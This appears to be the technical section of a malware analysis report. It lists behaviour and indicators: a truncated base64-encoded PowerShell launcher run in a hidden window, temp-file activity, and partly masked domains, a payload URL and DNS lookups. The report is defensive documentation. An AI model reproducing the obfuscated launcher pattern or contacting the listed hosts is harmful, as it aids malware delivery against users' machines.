Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAGoAbAA1AGwANQBnAD0AKAAoACcATAAxACcAKwAnADIAZgBlACcAKQArACcAMQAyACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVABFAE0AcABcAHcAbwByAGQAXAAyADAAMQA5AFwAIAAtAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1524
- %TEMP%\1360671.cvr
- 'ud##77.com':80
- 'ud##77.com':443
- 'gr####utions.com.au':443
- 'pa##a.ae':443
- http://ud##77.com/wordpress/J6n/
- DNS ASK po###emo.com
- DNS ASK ud##77.com
- DNS ASK gr####utions.com.au
- DNS ASK pa##a.ae
- DNS ASK la##yie.com
- DNS ASK tr##gie.com
- DNS ASK tr##iue.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAGoAbAA1AGwANQBnAD0AKAAoACcATAAxACcAKwAnADIAZgBlACcAKQArACcAMQAyACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVABFAE0AcABcAHcAbwByAGQAXAAyADAAMQA5AFwAIAAtAG...' (with hidden window)